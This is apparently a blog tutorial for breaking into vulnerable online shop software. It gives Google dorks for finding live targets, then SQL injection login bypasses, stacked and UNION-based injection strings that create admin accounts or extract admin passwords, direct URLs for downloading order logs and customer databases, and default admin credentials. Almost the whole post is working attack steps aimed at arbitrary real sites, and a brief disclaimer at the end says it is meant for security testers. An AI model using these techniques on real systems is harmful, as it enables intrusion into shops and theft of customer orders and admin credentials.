Most of these are outdated but they can still work if you happen to find a vulnerable site:

Step 1:
google dork :–> inurl:”/cart.php?m=”
target looks lile :–>…cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :–>
Usename : ‘or”=”
Password : ‘or”=

Step 2:
google dork :–> allinurlroddetail.asp?prod=
target looks like :–> (big leters and numbers )
exploit :–> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :–>

Step 3:
google dork :–> allinurl: /cgi-local/shopper.cgi
target looks like :–>….dd=action&key=
exploit :–> …&template=order.log
target whit exploit :–> http://www.xxxxxxxx…..late=order.log

Step 4:
google dork :–> allinurl: Lobby.asp
target looks like :–>
exploit :–> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :–>

Step 5:
google dork :–> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
Keyword=&category=5); update tbluser set fldpassword=” where
Keyword=&category=3); update tbluser set fldaccess=’1′ where
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where

login page: http://xxxxxxx/vpasp/shopadmin.asp

Step 6:
google dork :–> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :–>….asp?cat=xxxxxx
exploit :–>…20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername=’admin’%20and%20fldpassword%20like%2 0’a%25′-
if this is not working try this ends
after finding user and pass go to login page:

Step 7:
google dork :–> allinurl:/shopadmin.asp
target looks like :–>
user : ‘or’1
pass : ‘or’1

Step 8: :–> allinurl:/store/index.cgi/page=
target looks like :–>….short_blue.htm
exploit :–> ../admin/files/order.log
target whit exploit :–> http://www.xxxxxxx.c….iles/order.log

Step 9:–> allinurl:/metacart/
target looks like :–>
exploit :–> /database/metacart.mdb
target whit exploit :–>

Step 10:–> allinurl:/DCShop/
target looks like :–>
exploit :–> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :–> or

Step 11:–> allinurl:/shop/category.asp/catid=
target looks like :–>
exploit :–> /admin/dbsetup.asp
target whit exploit :–>
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :–> (dosent need to be like this)
in db look for access to find pass and user of shop admins.

Step 12:–> allinurl:/commercesql/
target looks like :–>
exploit :–> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :–>…./
target whit exploit admin manager :–>….in/manager.cgi
target whit exploit order.log :–>….iles/order.log

Step 13:–> allinurl:/eshop/
target looks like :–>
exploit :–>/cg-bin/eshop/database/order.mdb
target whit exploit :–>….base/order.mdb
after dl the db look at access for user and password

Step 14:
1/ search google: allinurl:”shopdisplayproducts.asp?id=

2/ find error by adding ‘

—>error: Microsoft JET database engine error “80040e14″…../shop$db.asp, line467

-If you don’t see error then change id to cat


3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser”having%201= 1–sp_password

—>…on%20select%20 1%20from%20tbluser”having%201=1–sp_password

—>error: 5’ union select 1 from tbluser “having 1=1–sp_password…. The number of column in the two selected tables or queries of a union queries do not match……

4/ add 2,3,4,5,6…….until you see a nice table

add 2
—->…on%20select%20 1,2%20from%20tbluser”having%201=1–sp_password
then 3
—->…on%20select%20 1,2,3%20from%20tbluser”having%201=1–sp_password
then 4 —->…on%20select%20 1,2,3,4%20from%20tbluser”having%201=1–sp_password

…5,6,7,8,9…. untill you see a table. (exp:…47)

—->…on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser” having%201=1–sp_password
—->see a table.

5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password

—>…on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1–sp_password

6/ Find link admin to login:
try this first:

Didn’t work? then u have to find yourself:

add: (for the above example) ‘%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration”ha ving%201=1–sp_password

—>…n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration”ha ving%201=1–sp_password

you’ll see something like: ( lot of them)


then guess admin link by adding the above data untill you find admin links

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
if you didn’t download the Database..
Try this while there is dblocation.

the url will be:
If u see the error message you have to try this :

download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at

inside you should be able to find *** information.
and you should even be able to find the admin username and password for the website.

the admin login page is usually located here

if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are

Username: admin
password: admin
Username: vpasp
password: vpasp

Note: Hacking is an illegal act and can cause you jail. This is a part of tutorial for security testers and professionals in the field of security. Please  do not use any hacking technology without the proper guidance and legal paperwork.

Send your feedbacks

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s